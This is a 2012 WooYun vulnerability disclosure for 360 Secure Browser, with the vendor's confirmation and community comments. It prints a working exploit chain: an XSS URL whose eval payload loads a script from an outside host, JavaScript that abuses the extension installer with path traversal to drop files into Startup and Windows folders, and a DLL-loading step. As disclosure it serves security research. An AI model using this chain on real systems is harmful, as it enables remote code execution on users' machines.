当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-013430

漏洞标题:360安全浏览器远程代码执行漏洞(360序列安全漏洞之二)

相关厂商:奇虎360

漏洞作者: 唐尸三摆手

提交时间:2012-10-16 23:52

修复时间:2012-11-30 23:53

公开时间:2012-11-30 23:53

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-10-16: 细节已通知厂商并且等待厂商处理中
2012-10-17: 厂商已经确认,细节仅向厂商公开
2012-10-20: 细节向第三方安全合作伙伴开放
2012-12-11: 细节向核心白帽子及相关领域专家公开
2012-12-21: 细节向普通白帽子公开
2012-12-31: 细节向实习白帽子公开
2012-11-30: 细节向公众公开

简要描述:

接着上次的漏洞之一来,希望能改变一下别人对技术的态度和看法,偶申明下偶是搞web安全的,但是也对客户端安全乃至安全有一些自己的看法,经过几天的研究又发现了一些严重问题,而且可以证明之前360忽略的漏洞是可以用来突破360自身的安全防御体系的,也就是用于绕过主动防御的,同时关于一些system32目录会不可写之类的安全限制其实自身都有缺陷,也都是可以绕过的,希望大家在评估安全问题的时候思路可以更为开阔点,更为坦诚点,尊重技术。
这里的问题都比较简单,某些问题都是乌云上公开过的,360浏览器在设计上存在一些缺陷,这也是翻看以前的360安全漏洞时学到的,加上在内部某些逻辑时存在问题导致任意覆盖本地文件但受到360自身的安全防护所以不能写入特殊目录,但如果加上上次360忽略的那个dll加载的漏洞实际上就变成可以远程直接加载任意代码的漏洞了。
貌似最新版也有问题

详细说明:

1 360浏览器存在设计缺陷
WooYun: 360安全浏览器远程代码执行漏洞
这里结界师有详细的分析啦,所以获得了一个下载扩展的权限
2 浏览器扩展设计存在缺陷
如果一个../../../../ext的扩展在释放的时候会被释放到上级目录,形成一个本地的目录遍历写入的漏洞,所以我们获得了任意写入本地文件的机会
3 360主程序存在安全漏洞
前段时间由360忽略的可以加载任意dll的漏洞配合第二个条件就可以越过各种安全防护从而启动自身的代码了
所以呢
1 我们需要一个高权限域的xss,这个很多啦

http://browser.baoku.360.cn/app/search?kw=%c0%27//%28%000000%0deval(unescape(location.hash.substr(1)));//#d=document;e=d.createElement('script');e.src='http://ha.ckers.org/xss.js?'+Math.random();d.body.appendChild(e);


baoku就有一个xss,不过貌似被ie的filter拦截啦,不过木有关系,用sogii@wooyun的bypass IE filter 0day即可获得完美xss
2 利用安装扩展写入本地的文件

var info="apptype=1;appdisplaytype=1;appid=/../../../../../Program Files/360/360se/;appname=登录管家;appver=1.0.7.1056;iconurl=http://w.qhimg.com/images/v2/360se/2011/appicons/1/LoginAssis.png;downurl=http://127.0.0.1/360.zip;callbackFunc=alert";external.twExtSendMessage2(external.twGetSecurityID(window), "pluginbar", "InstallAppItem", "", info);
var info="apptype=1;appdisplaytype=1;appid=/../../../../../Documents and Settings/All Users/「开始」菜单/程序/启动;


3 利用dll漏洞启动任意代码
利用dll+主动防御的缺陷即可,system32不可写可是path里的windows可写,这是神马逻辑!!启动栏外部进程不可写但是签名的程序可写,这不正好么

var info="apptype=1;appdisplaytype=1;appid=/../../../../../Program Files/360/360se/;appname=登录管家;appver=1.0.7.1056;iconurl=http://w.qhimg.com/images/v2/360se/2011/appicons/1/LoginAssis.png;downurl=http://127.0.0.1/360.zip;callbackFunc=alert";external.twExtSendMessage2(external.twGetSecurityID(window), "pluginbar", "InstallAppItem", "", info);
var info="apptype=1;appdisplaytype=1;appid=/../../../../../Documents and Settings/All Users/「开始」菜单/程序/启动;appname=登录管家;appver=1.0.7.1056;iconurl=http://w.qhimg.com/images/v2/360se/2011/appicons/1/LoginAssis.png;downurl=http://127.0.0.1/360.zip;callbackFunc=alert";external.twExtSendMessage2(external.twGetSecurityID(window), "pluginbar", "InstallAppItem", "", info);
var info="apptype=1;appdisplaytype=1;appid=/../../../../../windows/;appname=登录管家;appver=1.0.7.1056;iconurl=http://w.qhimg.com/images/v2/360se/2011/appicons/1/LoginAssis.png;downurl=http://127.0.0.1/361.zip;callbackFunc=alert";external.twExtSendMessage2(external.twGetSecurityID(window), "pluginbar", "InstallAppItem", "", info);
window.location="http://www.360.cn";

漏洞证明:

修复方案:

问下@360安杨 吧,他总是什么都懂

版权声明:转载请注明来源 唐尸三摆手@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-10-17 11:29

厂商回复:

确认是漏洞,我们正在修复,感谢乌云白帽子的热心反馈

最新状态:

暂无

漏洞评价:

评论

  1. 2012-10-16 23:55 | p.z 认证白帽子 ( 普通白帽子 | Rank:411 漏洞数:40 )

    碉堡了,果然有连续剧。

  2. 2012-10-17 00:14 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    必火啊~~

  3. 2012-10-17 00:15 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    http://v.youku.com/v_show/id_XNDYyODQ2MjUy.html我不会告诉你们真相的!

  4. 2012-10-17 00:20 | y35u ( 普通白帽子 | Rank:364 漏洞数:38 | yesu)

    @only_guest 密码?

  5. 2012-10-17 01:03 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @only_guest ..你又来骗点击。。。

  6. 2012-10-17 01:04 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    @gainover 何来骗点击一说...我发的可是真相...转账我50WB立即给你密码看!

  7. 2012-10-17 01:18 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    关注

  8. 2012-10-17 01:37 | 情深 ( 路人 | Rank:12 漏洞数:4 | 安全小白)

    必火

  9. 2012-10-17 02:05 | y35u ( 普通白帽子 | Rank:364 漏洞数:38 | yesu)

    @gainover 密码,他给过我,我只要5WB

  10. 2012-10-17 07:55 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    洞主V5

  11. 2012-10-17 08:32 | Jannock 认证白帽子 ( 核心白帽子 | Rank:2278 漏洞数:204 | 关注技术与网络安全(招人中,有兴趣请私信...)

    顶。。。

  12. 2012-10-17 08:53 | Jannock 认证白帽子 ( 核心白帽子 | Rank:2278 漏洞数:204 | 关注技术与网络安全(招人中,有兴趣请私信...)

    360安扬 大牛来解答一下所谓安全问题和安全漏洞的区别?还有这个类似的, WooYun: 腾讯一软件主程序存在漏洞

  13. 2012-10-17 09:11 | 有礼物送上 ( 普通白帽子 | Rank:187 漏洞数:26 | xxx)

    请问洞主,这部大片会有《一千零一夜》那么长吗?

  14. 2012-10-17 10:16 | pysolve ( 路人 | Rank:17 漏洞数:3 | Time is killing u when ur killing time!)

    坐等360安扬大牛发微薄科普辟谣

  15. 2012-10-17 10:40 | cnrstar ( 普通白帽子 | Rank:157 漏洞数:23 | Be my personal best!)

    周厂长肯定会说这不是漏洞的、

  16. 2012-10-17 10:42 | m4trix1 ( 路人 | Rank:10 漏洞数:2 | 绝对有jj)

    忽略忽略

  17. 2012-10-17 11:12 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    洞主继续,等着给你送wb

  18. 2012-10-17 11:14 | hongygxiang ( 普通白帽子 | Rank:115 漏洞数:12 | 蛋疼)

    围观,围观!

  19. 2012-10-17 11:50 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    确认是漏洞....哈哈....

  20. 2012-10-17 12:03 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @only_guest 搞半天是你们马甲

  21. 2012-10-17 12:06 | piaoye ( 普通白帽子 | Rank:343 漏洞数:53 | ww)

    @only_guest 的马甲啊啊啊啊啊啊啊

  22. 2012-10-17 12:27 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    @piaoye @xsser ....你们...知道的太多了

  23. 2012-10-17 12:58 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    我勒去。

  24. 2012-10-17 14:58 | wugui ( 路人 | Rank:15 漏洞数:4 | wugui@lcx.cc)

    连续剧

  25. 2012-10-17 16:50 | Hmily ( 路人 | 还没有发布任何漏洞 | 吾爱破解论坛)

    感谢各位,浏览器安全性越来越高了.

  26. 2012-10-17 16:54 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @Hmily 修复漏洞的时候,在changelog里或者哪个地方给个感谢吧,另外给这个兄弟发点礼物吧 别像你们那个安杨了

  27. 2012-10-17 16:57 | Hmily ( 路人 | 还没有发布任何漏洞 | 吾爱破解论坛)

    @xsser 好的,官方联系人员应该有礼物发放的,呵呵.

  28. 2012-10-17 19:23 | Jannock 认证白帽子 ( 核心白帽子 | Rank:2278 漏洞数:204 | 关注技术与网络安全(招人中,有兴趣请私信...)

    @xsser @Hmily 赞!

  29. 2012-10-17 21:07 | 冷冷的夜 ( 普通白帽子 | Rank:135 漏洞数:12 )

    @Hmily 天天发黄图的猥琐小伙子

  30. 2012-10-17 21:11 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    @Hmily 不妨发个妹子?

  31. 2012-10-17 21:29 | 乱雪 ( 路人 | Rank:2 漏洞数:3 | 一事无成,身心半健,穷。)

    @y35u @only_guest @gainover 我不会给别人说密码是pkav.net

  32. 2012-10-17 22:37 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    @乱雪 你好蛋疼...我要卖50个WB的!!!你赔我!!!

  33. 2012-10-18 12:56 | zhq445078388 ( 实习白帽子 | Rank:60 漏洞数:19 | 请牢记"杀进程点康姆")

    @Hmily Hmily大大..哈哈!居然冒泡了 太神奇了

  34. 2012-10-22 11:11 | 乱雪 ( 路人 | Rank:2 漏洞数:3 | 一事无成,身心半健,穷。)

    @only_guest 我随手输的。。。不是我的错。。。

  35. 2012-11-16 23:44 | wugui ( 路人 | Rank:15 漏洞数:4 | wugui@lcx.cc)

    牛大了。。

  36. 2012-11-18 12:46 | Jewer ( 路人 | Rank:6 漏洞数:1 | 我很苦逼。)

    我汗!牛人啊!

  37. 2012-11-18 15:32 | zhq445078388 ( 实习白帽子 | Rank:60 漏洞数:19 | 请牢记"杀进程点康姆")

    @only_guest 看过了..视频中所说的部分 有几个已经被浏览器自己修复,无意义,另,dll中包含的资源为已经展现的功能,仅仅是用做自我修复,却被炒成下蛋,其他地方,应该被算作bug的地方.不予提交已经很过分了,整个视频除了验证浏览器存在几处BUG,就是在表现360浏览器自我修复功能很牛,因为只要浏览器医生OK,其他都能搞定.另外所谓"下蛋",请问你将ie的组件删除看看是不是能自我修复呢?那么,如果IE被破坏,360浏览器被破坏的情况下,不能不依靠网络自我修复的浏览器,有何可用性?

  38. 2012-11-18 19:52 | 摩斯 ( 路人 | Rank:3 漏洞数:2 | 每天进步一点点!努力学习技术!)

    霸气十足~

  39. 2012-12-02 11:44 | isno ( 路人 | Rank:20 漏洞数:3 | test)

    bypass IE filter 0day